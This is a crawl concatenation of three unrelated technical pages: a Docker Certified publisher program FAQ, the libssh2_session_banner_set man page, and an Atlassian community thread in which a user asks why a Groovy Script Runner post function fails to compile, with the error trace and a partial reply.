issue on the application, Docker advises the customer about the publisher support process and performs a handover directly to the publisher if required. TSAnet is required for exchange of support tickets between the publisher and Docker. How does a publisher apply to the Docker Certified program? Start by applying to be a Docker Technology Partner Requires acceptance of partnership agreement for completion Identify commercial content that can be listed on Store and includes a support offering Test your image against the Docker CS Engine 1.12+ or on a Docker Certified Infrastructure version 17.03 and above (Plugins must run on 17.03 and above) Submit your image for Certification through the publisher portal. Docker scans the image and works with you to address vulnerabilities. Docker also conducts a best practices review of the image. Be a TSAnet member or join the Docker Limited Group. Upon completion of Certification criteria, and acceptance by Docker, the Publisher’s product page is updated to reflect Certified status. Is there a fee to join the program? In the future, Docker may charge a small annual listing fee. This is waived for the initial period. What is the difference between Official Images and Docker Certified? Many Official images transition to the Docker Certified program and are maintained and updated by the original owner of the software. Docker continues to maintain some of the base OS images and language frameworks. How is certification of plugins handled? Docker Certification program recognizes the need to apply special scrutiny and testing to containers that access system level interfaces like storage volumes and networking. Docker identifies these special containers as “Plugins” which require additional testing by the publisher or Docker. These plugins employ the V2 Plugin Architecture that was first made available in 1.12 (experimental) and now available in Docker Enterprise Edition 17.03Docker, docker, store, purchase images
https://docs.docker.com/docker-store/publish/
CC-MAIN-2018-34
en
refinedweb
libssh2_session_banner_set man page libssh2_session_banner_set — set the SSH protocol banner for the local client Synopsis #include <libssh2.h> int libssh2_session_banner_set(LIBSSH2_SESSION *session, const char *banner); Description session - Session instance as returned by libssh2_session_init_ex(3) banner - A pointer to a zero-terminated string holding the user defined banner Set the banner that will be sent to the remote host when the SSH session is started with libssh2_session_handshake(3) This is optional; a banner corresponding to the protocol and libssh2 version will be sent by default. Return Value Returns 0 on success or negative on failure. It returns LIBSSH2_ERROR_EAGAIN when it would otherwise block. While LIBSSH2_ERROR_EAGAIN is a negative number, it isn't really a failure per se. Errors LIBSSH2_ERROR_ALLOC - An internal memory allocation call failed. Availability Added in 1.4.0. Before 1.4.0 this function was known as libssh2_banner_set(3) See Also libssh2_session_handshake(3), libssh2_session_banner_get(3) Referenced By libssh2_banner_set(3), libssh2_session_banner_get(3).
https://www.mankier.com/3/libssh2_session_banner_set
CC-MAIN-2018-34
en
refinedweb
It's not the same without you Join the community to find out what other Atlassian users are discussing, debating and creating. I can't seem to find any good documentation on Script Runner or any examples for doing this online. The one link I found that seemed promising doesn't work, and I can't find documentation to figure out what's wrong. Does anyone have any examples of updating a select list custom field in a post function on a transition? Also, is there a good resource for Script Runner out there? Script runner seems very powerful, but it's lacking heavily in documentation. I love jira-python and am really productive with it even though I don't know python just because the documentation is so good. It seems like you really could do anything with Script Runner if it had decent docs/examples. Here's what I have... /* IF issue has the 'Assigned QA' field populated, set 'QA % Complete' value to 100 when issue is closed */ import com.atlassian.jira.component.ComponentAccessor import com.atlassian.jira.issue.MutableIssue import com.atlassian.jira.ComponentManager; import com.atlassian.jira.issue.fields.CustomField; import com.atlassian.jira.issue.CustomFieldManager; MutableIssue issue = issue def customFieldManager = ComponentAccessor.getCustomFieldManager() def qaResourceCf = customFieldManager.getCustomFieldObjectByName("Assigned QA") def qaResource = issue.getCustomFieldValue(qaResourceCf) def CustomFieldManager cFM_QAPercent = ComponentManager.getInstance().getCustomFieldManager() def CustomField qaPercent = cFM_QAPercent.getCustomFieldObjectByName("QA % Complete") def Options options = WebAppsCf.getOptions(null, qaPercent.getRelevantConfig(issue), null); def Option newOption = options.getOptionById(10840); ModifiedValue mVal = new ModifiedValue(issue.getCustomFieldValue(qaPercent), newOption ); if (qaResource) { customField.updateValue(null, issue, mVal, new DefaultIssueChangeHolder()); } Here are the errors I get: Caused by: org.codehaus.groovy.control.MultipleCompilationErrorsException: startup failed: Script1.groovy: 16: unable to resolve class Options @ line 16, column 13. def Options options = WebAppsCf.getOptions(null, qaPercent.getRelevantConfig(issue), null); ^ @ line 17, column 12. def Option newOption = options.getOptionById(10840); ^ Script1.groovy: 19: unable to resolve class ModifiedValue @ line 19, column 15. ModifiedValue mVal = new ModifiedValue(issue.getCustomFieldValue(qaPercent), newOption ); ^ Script1.groovy: 19: unable to resolve class ModifiedValue @ line 19, column 22. ModifiedValue mVal = new ModifiedValue(issue.getCustomFieldValue(qaPercent), newOption ); ^ Script1.groovy: 22: unable to resolve class DefaultIssueChangeHolder @ line 22, column 48. pdateValue(null, issue, mVal, new Defaul ^ 5 errors at org.codehaus.groovy.control.ErrorCollector.failIfErrors(ErrorCollector.java:302) at org.codehaus.groovy.control.CompilationUnit.applyToSourceUnits(CompilationUnit.java:858) at org.codehaus.groovy.control.CompilationUnit.doPhaseOperation(CompilationUnit.java:548) at org.codehaus.groovy.control.CompilationUnit.compile(CompilationUnit.java:497) at groovy.lang.GroovyClassLoader.doParseClass(GroovyClassLoader.java:306) at groovy.lang.GroovyClassLoader.parseClass(GroovyClassLoader.java:287) at groovy.lang.GroovyClassLoader.parseClass(GroovyClassLoader.java:267) at groovy.lang.GroovyClassLoader.parseClass(GroovyClassLoader.java:214) at org.codehaus.groovy.jsr223.GroovyScriptEngineImpl.getScriptClass(GroovyScriptEngineImpl.java:337) at org.codehaus.groovy.jsr223.GroovyScriptEngineImpl.eval(GroovyScriptEngineImpl.java:109) ... 186 more You're trying to use ModifiedValue but you haven't imported it! import com.atlassian.jira.issue.Modified.
https://community.atlassian.com/t5/Jira-questions/Script-runner-how-to-update-custom-field-that-s-a-select-list/qaq-p/203693
CC-MAIN-2018-34
en
refinedweb